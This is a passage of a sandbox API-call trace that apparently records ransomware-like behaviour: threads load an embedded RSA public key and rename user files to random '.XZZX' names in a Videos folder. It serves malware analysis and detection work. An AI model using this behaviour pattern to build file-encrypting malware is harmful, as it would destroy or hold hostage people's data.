[0197.849] SetErrorMode (uMode=0x1) returned 0x1 [0197.849] lstrcpyW (in: lpString1=0x2caf860, lpString2="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" | out: lpString1="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX" [0197.849] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x30d288a9, Data2=0x6d6b, Data3=0x45a0, Data4=([0]=0xa1, [1]=0xa7, [2]=0xc3, [3]=0x85, [4]=0xa2, [5]=0x1f, [6]=0xcb, [7]=0xd3))) returned 0x0 [0197.849] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\18EF94CC2373DB0BFE65EAD427A8BF53.XZZX") returned 117 [0197.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0197.849] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\0C2F13A31DC239E030D288A9208D1E28.XZZX") returned 117 [0197.850] StrStrW (lpFirst="18EF94CC2373DB0BFE65EAD427A8BF53.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 760 os_tid = 0xe78 [0198.002] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.002] lstrcpyW (in: lpString1=0x2caf460, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0198.002] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.002] SetErrorMode (uMode=0x1) returned 0x1 [0198.002] lstrcpyW (in: lpString1=0x2caf860, lpString2="3509B27C28C34484E701F4A52D2D28CC.XZZX" | out: lpString1="3509B27C28C34484E701F4A52D2D28CC.XZZX") returned="3509B27C28C34484E701F4A52D2D28CC.XZZX" [0198.002] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xd8d1ee87, Data2=0xe790, Data3=0x4fcc, Data4=([0]=0x8c, [1]=0x78, [2]=0x93, [3]=0x7c, [4]=0x33, [5]=0x21, [6]=0xf9, [7]=0x8c))) returned 0x0 [0198.002] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\3509B27C28C34484E701F4A52D2D28CC.XZZX") returned 117 [0198.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.002] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6451FCF0482DF6C0D8D1EE874AF8DB08.XZZX") returned 117 [0198.003] StrStrW (lpFirst="3509B27C28C34484E701F4A52D2D28CC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 761 os_tid = 0xe7c [0198.158] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.158] lstrcpyW (in: lpString1=0x2caf460, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0198.158] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.158] SetErrorMode (uMode=0x1) returned 0x1 [0198.158] lstrcpyW (in: lpString1=0x2caf860, lpString2="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" | out: lpString1="36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned="36D405DA123E25CCEFB9A7DD165F0A14.XZZX" [0198.158] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa69ae1be, Data2=0x1eae, Data3=0x4969, Data4=([0]=0xb5, [1]=0x28, [2]=0xb6, [3]=0xb9, [4]=0xe7, [5]=0x4e, [6]=0x88, [7]=0x50))) returned 0x0 [0198.158] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\36D405DA123E25CCEFB9A7DD165F0A14.XZZX") returned 117 [0198.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.158] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\63B9B32408CC335EA69AE1BE0B9717A6.XZZX") returned 117 [0198.158] StrStrW (lpFirst="36D405DA123E25CCEFB9A7DD165F0A14.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 762 os_tid = 0xe80 [0198.314] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.314] lstrcpyW (in: lpString1=0x2caf460, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0198.314] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.314] SetErrorMode (uMode=0x1) returned 0x1 [0198.314] lstrcpyW (in: lpString1=0x2caf860, lpString2="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" | out: lpString1="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX" [0198.314] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xe4d3f587, Data2=0x5f2e, Data3=0x4a7b, Data4=([0]=0x8b, [1]=0xa9, [2]=0xd8, [3]=0xe6, [4]=0xeb, [5]=0x2e, [6]=0x85, [7]=0xc0))) returned 0x0 [0198.314] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX") returned 117 [0198.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.314] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\C63337421BB1071AE4D3F5871E7BEB62.XZZX") returned 117 [0198.314] StrStrW (lpFirst="5BBECDA81A1E287C9DF89F941E9E0CC4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 763 os_tid = 0xe84 [0198.470] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.470] lstrcpyW (in: lpString1=0x2caf460, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0198.470] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.470] SetErrorMode (uMode=0x1) returned 0x1 [0198.471] lstrcpyW (in: lpString1=0x2caf860, lpString2="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" | out: lpString1="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" [0198.471] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x35cf3ec5, Data2=0xd7ad, Data3=0x4007, Data4=([0]=0x9c, [1]=0xd2, [2]=0x4a, [3]=0xd3, [4]=0x99, [5]=0xf9, [6]=0x4e, [7]=0x69))) returned 0x0 [0198.471] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned 117 [0198.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.471] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6AC4DE2135F125BB35CF3EC538BC0A03.XZZX") returned 117 [0198.471] StrStrW (lpFirst="6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 764 os_tid = 0xe88 [0198.626] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.626] lstrcpyW (in: lpString1=0x2caf460, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0198.626] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.626] SetErrorMode (uMode=0x1) returned 0x1 [0198.626] lstrcpyW (in: lpString1=0x2caf860, lpString2="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" | out: lpString1="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" [0198.626] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x5744b2ab, Data2=0xcbbc, Data3=0x49b8, Data4=([0]=0xbf, [1]=0xa8, [2]=0x68, [3]=0x3d, [4]=0x38, [5]=0xae, [6]=0x82, [7]=0xa6))) returned 0x0 [0198.626] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned 117 [0198.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.626] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\9020CE943AAB0B205744B2AB3D75EF68.XZZX") returned 117 [0198.626] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 765 os_tid = 0xe8c [0198.782] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.782] lstrcpyW (in: lpString1=0x2caf460, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0198.782] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0198.782] SetErrorMode (uMode=0x1) returned 0x1 [0198.782] lstrcpyW (in: lpString1=0x2caf860, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0198.782] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb502bdb1, Data2=0xb44f, Data3=0x4b79, Data4=([0]=0xb6, [1]=0xed, [2]=0xca, [3]=0x9c, [4]=0x61, [5]=0xa1, [6]=0xae, [7]=0xcd))) returned 0x0 [0198.782] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\D1B4BDC437A182A42497439F3BC266EC.XZZX") returned 117 [0198.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.782] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\C938FD9F35285E57B502BDB137F3429F.XZZX") returned 117 [0198.782] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 766 os_tid = 0xe90 [0198.941] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0198.941] lstrcpyW (in: lpString1=0x2caf460, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0198.941] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0198.941] SetErrorMode (uMode=0x1) returned 0x1 [0198.941] lstrcpyW (in: lpString1=0x2caf860, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0198.941] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xf82d69d1, Data2=0x8556, Data3=0x4589, Data4=([0]=0xbb, [1]=0x71, [2]=0xe1, [3]=0xc1, [4]=0x55, [5]=0xa2, [6]=0x6d, [7]=0xde))) returned 0x0 [0198.941] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\60CA942226AA4A29961B00962ADF2E71.XZZX") returned 104 [0198.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0198.941] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\F73B213624378906F82D69D127026D4E.XZZX") returned 104 [0198.941] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 767 os_tid = 0xe94 [0199.094] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC 